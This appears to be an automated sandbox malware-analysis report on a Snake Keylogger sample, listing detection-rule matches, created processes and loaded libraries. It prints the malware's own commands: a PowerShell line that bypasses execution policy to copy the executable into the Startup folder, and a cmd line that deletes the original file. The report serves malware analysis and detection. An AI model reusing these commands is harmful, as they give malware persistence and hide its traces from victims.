            Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 2716, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: upXUt2jZ0S.exe PID: 1184, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: classification engineClassification label: mal100.spre.troj.adwa.evad.winEXE@19/16@3/3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7624
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4oc1j4jg.cbj.ps1Jump to behavior
            Source: upXUt2jZ0S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: upXUt2jZ0S.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: upXUt2jZ0S.exeReversingLabs: Detection: 68%
            Source: upXUt2jZ0S.exeVirustotal: Detection: 61%
            Source: unknownProcess created: C:\Users\user\Desktop\upXUt2jZ0S.exe "C:\Users\user\Desktop\upXUt2jZ0S.exe"
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Users\user\Desktop\upXUt2jZ0S.exe "C:\Users\user\Desktop\upXUt2jZ0S.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1528
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Users\user\Desktop\upXUt2jZ0S.exe "C:\Users\user\Desktop\upXUt2jZ0S.exe"Jump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\upXUt2jZ0S.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
